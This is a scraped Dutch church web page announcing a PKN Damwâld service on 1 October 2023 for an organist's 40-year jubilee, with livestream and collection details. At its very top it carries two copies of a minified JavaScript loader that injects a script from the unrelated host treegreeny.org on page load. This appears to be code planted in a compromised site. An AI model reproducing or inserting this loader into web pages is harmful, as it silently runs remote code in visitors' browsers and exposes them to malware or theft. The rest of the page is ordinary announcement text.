;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 1 oktober 2023 9:30 uur - PKN Damwâld
zondag 1 oktober 2023
09:30 uur
De dienst staat in het teken van het 40-jarige jubileum van Margrietha Zagema als organist. Na afloop van de dienst is gelegenheid voor felicitaties en is er koffie!

Kerkdienst zondag 1 oktober 2023 9:30 uur

Informatie

Voorganger:Ds. S. Boukes
Organist:Margrietha Zagema
Mededeling:De dienst staat in het teken van het 40-jarige jubileum van Margrietha Zagema als organist. Na afloop van de dienst is gelegenheid voor felicitaties en is er koffie!
LivestreamDienst terugkijken
Bekijk op Youtube
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Kerk
Tweede collecte: Collecte Diaconie Israëlzondagcollecte

Collecte Protestantse Kerk (Kerk & Israël) (collectenr. 23087)
Israëlzondagcollecte
Voor de Protestantse Kerk is de relatie met het Joodse volk een wezenlijk onderdeel van de eigen identiteit. Daarom bezinnen we ons op de joodse wortels van ons geloof en bevorderen we het gesprek tussen joden en christenen. Ook staan we op tegen antisemitisme. In Nederland rusten we predikanten en gemeenten toe op het gebied van de relatie met het volk Israël. In Israël steunen we onder andere het werk van Nes Ammim, een internationale christelijke gemeenschap. De eerste zondag in oktober is Israëlzondag. Hiermee geeft de Protestantse Kerk uiting aan haar roeping tot verbondenheid met Israël. Daarom collecteren we voor de ontmoeting tussen de kerk en Israël.

Uitganscollecte: Uitgangscollecte t.b.v. de gestegen energiekosten